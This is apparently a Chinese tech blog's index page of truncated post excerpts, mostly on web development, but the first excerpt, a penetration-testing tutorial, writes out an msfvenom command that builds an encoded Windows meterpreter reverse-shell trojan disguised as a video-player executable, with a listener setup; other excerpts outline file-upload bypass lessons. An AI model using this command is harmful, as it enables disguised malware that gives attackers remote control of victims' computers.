Dec212021
渗透测试之后门软件
1. 制作Windows恶意软件
1.1 使用msfvenom生成后门木马
制作后门程序
sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音.exe
、
msf启动handler监听后门程序,
use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.14...阅读全文
作者:绝缘体.. | 分类:amd, apache, html, Linux, windows, 开发工具, 操作系统, 科技企业, 编程语言 | 阅读: | 标签:amd, Apache, html, Linux, windows
抢沙发
Dec132021
数据库连接池性能优化终极指南:从HikariCP到Druid的调优实践与监控告警配置
数据库连接池性能优化终极指南:从HikariCP到Druid的调优实践与监控告警配置
引言:为什么数据库连接池是性能瓶颈的关键所在?
在现代分布式系统架构中,数据库作为数据持久化的核心组件,其响应速度直接影响整个系统的吞吐量和用户体验。然而,频繁地创建和销毁数据库连接是一项昂贵的操作——它涉及网络握手、身份验证、内存分配等开销。若每个请求都直接建立新连接,系统将迅速陷入“连接...阅读全文
Dec112021
在Linux上部署Web服务器
在当前互联网时代,搭建自己的Web服务器是一项非常常见的任务。而Linux作为一种稳定、安全、灵活且开源的操作系统,成为了许多人选择部署Web服务器的首选系统。本文将向您介绍如何在Linux上部署自己的Web服务器。
步骤一:选择适合的Linux发行版
首先,您需要选择适合您需求的Linux发行版。常见的选择包括Ubuntu、CentOS、Debian等。每种发行版都有其优缺点,您可以根据您的需求、熟悉程...阅读全文
Dec102021
使用 Canvas 实现粒子效果的酷炫动画
在现代Web开发中,动画效果已经成为网站设计中不可或缺的一部分。而其中的酷炫粒子效果则备受瞩目,给用户带来了独特的视觉体验。本文将介绍如何使用Canvas来实现一个令人惊叹的粒子效果动画。
准备工作
首先,我们需要在HTML文件中创建一个Canvas元素,用于显示我们的动画。可以通过以下代码来实现:
<canvas id="canvas"></canvas>
接下来,我们需要一些CSS样式来设置Can...阅读全文
Dec052021
使用jQuery实现全屏滚动效果
全屏滚动效果是一种常见的网页设计动画效果,它能够给用户带来流畅的浏览体验,同时也能提升网页的视觉效果。本篇博客将介绍如何使用jQuery实现全屏滚动效果。
准备工作
在开始之前,我们需要引入以下必要的文件:
jQuery库文件
全屏滚动效果插件(例如fullpage.js)
CSS样式文件
HTML结构
首先,我们需要在HTML文件中创建一个满屏容器,例如:
<div id="fullpage">
<div cl...阅读全文
Dec052021
了解HTTP/1.1与HTTP/2协议的差异
介绍
在互联网中,HTTP(Hypertext Transfer Protocol)是一种用于传输超媒体文档(如HTML)的应用层协议。它建立在TCP/IP协议之上,被广泛用于Web浏览器和服务器之间的通信。HTTP/1.1是HTTP协议的一个重要版本,而HTTP/2则是其后续版本。本文将探讨HTTP/1.1与HTTP/2协议的差异,了解它们在网络通信中的不同之处。
HTTP/1.1的特点与限制
HTTP/1.1是HTTP协议的主要版本之一,经过多年的发...阅读全文
Dec032021
高德地图获取当前地理详细位置信息
调用高德地图api获取当前地理位置的详细信息。
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="initial-scale=1.0, user-scalable=no, width=device-width">
<title>浏览器精确定位</title>
<body>
<p id="res...阅读全文
Dec022021
23:WEB漏洞-文件上传之解析漏洞编辑器安全
本课重点
几种常见中间件解析漏洞简要演示
案例1:中间件解析漏洞思维导图
几种常见Web编辑器简要演示
案例2:fckeditor2.6.3 文件上传漏洞
几种常见CMS文件上传简要演示
案例3:通达OA文件上传+文件包含漏洞
贴近实际应用下的以上知识点演示
案例4:贴近实际应用下以上知识点总结
案例1:中间件解析漏洞思维导图
演示案例见上篇博客
案例2:fckeditor2.6.3 文件上传漏洞
...阅读全文
Dec022021
22:WEB漏洞-文件上传之内容逻辑数组绕过与解析漏洞
知识点
文件头检测
图像文件信息判断
逻辑安全-二次渲染
逻辑安全-条件竞争
目录命名-x.php/.
脚本函数漏洞-CVE-2015-2348
数组接受+目录命名
本课重点:
Uploadlabs-pass13-20关卡测试
案例1:Pass-13 文件头检测 图片马绕过
案例2:Pass-14 getimagesize()图像文件信息判断 图片马绕过
案例3:Pass-15 exif_imagetype()图像文件信息判断 图片马绕过
案例4:Pass-16 二次渲染绕过
案...阅读全文
Dec022021
21:WEB漏洞-文件上传之后端黑白名单绕过
知识点
文件上传常见验证:后缀名,类型,文件头等
1.后缀名:黑名单,白名单
黑名单:明确不让上传的格式后缀,比如asp,php,jsp,aspx,cgi,war等,但是黑名单易被绕过,比如上传php5,Phtml等
白名单:明确可以上传的格式后缀,比如jpg,png,zip,rar,gif等,推荐白名单。
2.文件类型:MIME信息
content-type字段校验,可以通过抓包改包方式绕过
3.文件头:内容头信息
每种类型的文件都...阅读全文